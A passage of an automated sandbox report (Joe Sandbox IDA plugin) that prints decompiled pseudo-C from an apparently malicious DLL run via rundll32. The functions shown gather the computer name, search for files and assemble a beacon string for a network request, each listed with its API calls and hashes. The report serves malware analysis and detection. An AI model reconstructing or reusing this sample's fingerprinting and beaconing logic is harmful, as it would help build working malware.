                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}






















                                          APIs
                                            • Part of subcall function 06774FFA: SysAllocString.OLEAUT32(80000002), ref: 06775057
                                            • Part of subcall function 06774FFA: SysFreeString.OLEAUT32(00000000), ref: 067750BD
                                          • SysFreeString.OLEAUT32(?), ref: 0677650B
                                          • SysFreeString.OLEAUT32(0677A6F4), ref: 06776515
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: f4edce3381657d2f36f9b6830fa77225708a141dad27a309d459816881f62e1f
                                          • Instruction ID: a9ee5917cdbd0c049050c502661d66fd456ab0af35b2e909d0a531baa394359a
                                          • Opcode Fuzzy Hash: f4edce3381657d2f36f9b6830fa77225708a141dad27a309d459816881f62e1f
                                          • Instruction Fuzzy Hash: FE317A71900549AFCF21DF68CC88CABBB7AFFC96407144658F9159B218E231DD81DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E067773E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E067758BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E0677147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}










                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,067751DC,7519F710,00000000,?,?,067751DC), ref: 06777401
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,067751DC,067751DD,?,?,067751DC), ref: 0677741E
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 6dd5d2de6b37951816266abc27456f79c9255cfea55b08cace66d2e70fc52231
                                          • Instruction ID: e73f7ae60146725fb575b6cfffbfe4d1ff1cc816e4b3fd476cb66a5d3e034c12
                                          • Opcode Fuzzy Hash: 6dd5d2de6b37951816266abc27456f79c9255cfea55b08cace66d2e70fc52231
                                          • Instruction Fuzzy Hash: 54F0B426B10109BAEF51DAB98C04EAF7ABDDBC5640F200059A914E3104EA70DF0197B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E06777BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x677d2a4; // 0x4ca5a8
                                          				_t4 = _t15 + 0x677e39c; // 0x6c48944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x677e124; // 0x650047
                                          				_t17 = E0677642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E06774CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}











                                          APIs
                                            • Part of subcall function 0677642C: SysFreeString.OLEAUT32(?), ref: 0677650B
                                            • Part of subcall function 06774CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0677358E,004F0053,00000000,?), ref: 06774CDC
                                            • Part of subcall function 06774CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0677358E,004F0053,00000000,?), ref: 06774D06
                                            • Part of subcall function 06774CD3: memset.NTDLL ref: 06774D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 06777C0C
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 5bb0976ba90278973de671f65d831230c6ddb1020a84915ba4064ba10efc161a
                                          • Instruction ID: 8627c368d5067876bcfe89b964e19d2f40b1887717349be03e51b79272ea3d9a
                                          • Opcode Fuzzy Hash: 5bb0976ba90278973de671f65d831230c6ddb1020a84915ba4064ba10efc161a
                                          • Instruction Fuzzy Hash: 1301B17150001ABFDF959FA4CC04DAABBBDEF08211F004961EA05E7020E3719962CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E06779347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0x677d330;
                                          				E0677684E();
                                          				while(1) {
                                          					_t8 = E067732BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E0677A5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0x677d238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E0677684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0x677d338; // 0x6c49b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}














                                          APIs
                                            • Part of subcall function 0677684E: GetProcAddress.KERNEL32(36776F57,0677935F), ref: 06776869
                                            • Part of subcall function 067732BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 067732E5
                                            • Part of subcall function 067732BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 06773307
                                            • Part of subcall function 067732BA: memset.NTDLL ref: 06773321
                                            • Part of subcall function 067732BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0677335F
                                            • Part of subcall function 067732BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 06773373
                                            • Part of subcall function 067732BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 0677338A
                                            • Part of subcall function 067732BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 06773396
                                            • Part of subcall function 067732BA: lstrcat.KERNEL32(?,642E2A5C), ref: 067733D7
                                            • Part of subcall function 067732BA: FindFirstFileA.KERNEL32(?,?), ref: 067733ED
                                            • Part of subcall function 0677A5E9: lstrlen.KERNEL32(?,00000000,0677D330,00000001,0677937A,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?), ref: 0677A5F2
                                            • Part of subcall function 0677A5E9: mbstowcs.NTDLL ref: 0677A619
                                            • Part of subcall function 0677A5E9: memset.NTDLL ref: 0677A62B
                                          • HeapFree.KERNEL32(00000000,0677D00C,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?,0677D00C,?,?), ref: 06779396
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 3b85901d9b3a763dcfebcbefb190f7f5078feb5131ad8a064943f9dd382de014
                                          • Instruction ID: 146ce5f1f1f6bb2a11279d8ddee55c8df75b99ed204c86add3595e279a9256c8
                                          • Opcode Fuzzy Hash: 3b85901d9b3a763dcfebcbefb190f7f5078feb5131ad8a064943f9dd382de014
                                          • Instruction Fuzzy Hash: 4A012831601305AEEF905FB6CD84B7EB6A9EF46264F001036FB4CC60C0D6A08C81D3A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E06771B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E06777BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E067774B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0x677d238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}








                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,0677690C,?,004F0053,06C49388,00000000,?), ref: 06771B60
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 304a461d5e5c49e40cce27d6c343187584fa2048dfeb5d0ad328a965015d9a71
                                          • Instruction ID: 91d0a627fdd03c1ada87009efb31f9e85703fde9362d2e671680a79c81e934c7
                                          • Opcode Fuzzy Hash: 304a461d5e5c49e40cce27d6c343187584fa2048dfeb5d0ad328a965015d9a71
                                          • Instruction Fuzzy Hash: 63016232100209FBDF62DFA4DC05FAA3B69EF04360F44C415FA199A270E7309920D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0677A872(intOrPtr* __edi) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t15;
                                          				intOrPtr* _t21;
                                          
                                          				_t21 = __edi;
                                          				_push( &_v12);
                                          				_push(__edi);
                                          				_v8 = 0x1d4c0;
                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                          				while(1) {
                                          					_v16 = _t15;
                                          					Sleep(0x1f4); // executed
                                          					if(_v12 == 4) {
                                          						break;
                                          					}
                                          					if(_v8 == 0) {
                                          						L4:
                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                          						continue;
                                          					} else {
                                          						if(_v8 <= 0x1f4) {
                                          							_v16 = 0x80004004;
                                          						} else {
                                          							_v8 = _v8 - 0x1f4;
                                          							goto L4;
                                          						}
                                          					}
                                          					L8:
                                          					return _v16;
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9c61467b43d674fcb90463aaebcffe5d20822c4c36811cc6fa018bb1371f3464
                                          • Instruction ID: 9636c85d585f2e416f78e5b9f602b28d324b2ef5e30e56cd3501d0b5c0025fa4
                                          • Opcode Fuzzy Hash: 9c61467b43d674fcb90463aaebcffe5d20822c4c36811cc6fa018bb1371f3464
                                          • Instruction Fuzzy Hash: F6F0E775D11258EFEF02DB94C988AFDB7B8EF09344F1484AAE502A3240D7B46B85CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 66%
                                          			E0677514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0x677d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0x677d014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0x677d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0x677d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0x677d2a4; // 0x4ca5a8
                                          				_t3 = _t31 + 0x677e633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x677d02c,  *0x677d004, _t26);
                                          				_t34 = E067757AB();
                                          				_t35 =  *0x677d2a4; // 0x4ca5a8
                                          				_t4 = _t35 + 0x677e673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E067773E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0x677d2a4; // 0x4ca5a8
                                          					_t6 = _t86 + 0x677e8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0x677d238, 0, _t99);
                                          				}
                                          				_t100 = E0677614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0x677d2a4; // 0x4ca5a8
                                          					_t8 = _t81 + 0x677e8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0x677d238, 0, _t100);
                                          				}
                                          				_t101 =  *0x677d324; // 0x6c495b0
                                          				_a32 = E0677757B(0x677d00a, _t101 + 4);
                                          				_t43 =  *0x677d2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0x677d2a4; // 0x4ca5a8
                                          					_t11 = _t77 + 0x677e8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0x677d2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0x677d2a4; // 0x4ca5a8
                                          					_t13 = _t74 + 0x677e8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0x677d238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E0677749F(GetTickCount());
                                          						_t51 =  *0x677d324; // 0x6c495b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0x677d324; // 0x6c495b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0x677d324; // 0x6c495b0
                                          						_t106 = E06774D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0x677c294);
                                          							_t63 =  *0x677d2a4; // 0x4ca5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0x677e252; // 0x616d692f
                                          							_t65 = E06779DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E0677666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E06776106();
                                          								}
                                          								HeapFree( *0x677d238, 0, _v48);
                                          							}
                                          							HeapFree( *0x677d238, 0, _t106);
                                          						}
                                          						HeapFree( *0x677d238, 0, _t103);
                                          					}
                                          					HeapFree( *0x677d238, 0, _a24);
                                          				}
                                          				HeapFree( *0x677d238, 0, _t108);
                                          				return _a12;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 06775166
                                          • wsprintfA.USER32 ref: 067751B3
                                          • wsprintfA.USER32 ref: 067751D0
                                          • wsprintfA.USER32 ref: 067751F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06775203
                                          • wsprintfA.USER32 ref: 06775225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06775235
                                          • wsprintfA.USER32 ref: 0677526C
                                          • wsprintfA.USER32 ref: 0677528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 067752A9
                                          • GetTickCount.KERNEL32 ref: 067752B9
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 067752CD
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 067752EB
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?,06C495B0), ref: 06774D57
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(?,?,?,067752FE,?,06C495B0), ref: 06774D5F
                                            • Part of subcall function 06774D2C: strcpy.NTDLL ref: 06774D76
                                            • Part of subcall function 06774D2C: lstrcat.KERNEL32(00000000,?), ref: 06774D81
                                            • Part of subcall function 06774D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,067752FE,?,06C495B0), ref: 06774D9E
                                          • StrTrimA.SHLWAPI(00000000,0677C294,?,06C495B0), ref: 0677531D
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?,00000000,00000000,06775335,616D692F,00000000), ref: 06779DFB
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?), ref: 06779E03
                                            • Part of subcall function 06779DEF: lstrcpy.KERNEL32(00000000,?), ref: 06779E1A
                                            • Part of subcall function 06779DEF: lstrcat.KERNEL32(00000000,?), ref: 06779E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 06775348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0677534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 0677535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 06775360
                                            • Part of subcall function 0677666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 06776720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 06775390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 0677539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,06C495B0), ref: 067753AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 067753C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 067753CF
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 6fbf75d0a360a667d997ce71d353f4d7cc1c76957c648bc8fef55ee3c29c1758
                                          • Instruction ID: 5a5e42453cffa3af4381f8ac434f7f8fdb70c414f39547d180184c0dc9d4ae88
                                          • Opcode Fuzzy Hash: 6fbf75d0a360a667d997ce71d353f4d7cc1c76957c648bc8fef55ee3c29c1758
                                          • Instruction Fuzzy Hash: 3661E371900201AFDB61DF64EC48F6A77EAEF48314F054524FB08DB254EB35E906DBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E0677ADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x6770000;
                                          				_t115 = _t139[3] + 0x6770000;
                                          				_t131 = _t139[4] + 0x6770000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x6770000;
                                          				_v16 = _t139[5] + 0x6770000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x6770002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x677d1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x677d1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x677d1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x677d19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x677d1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x677d198; // 0x0
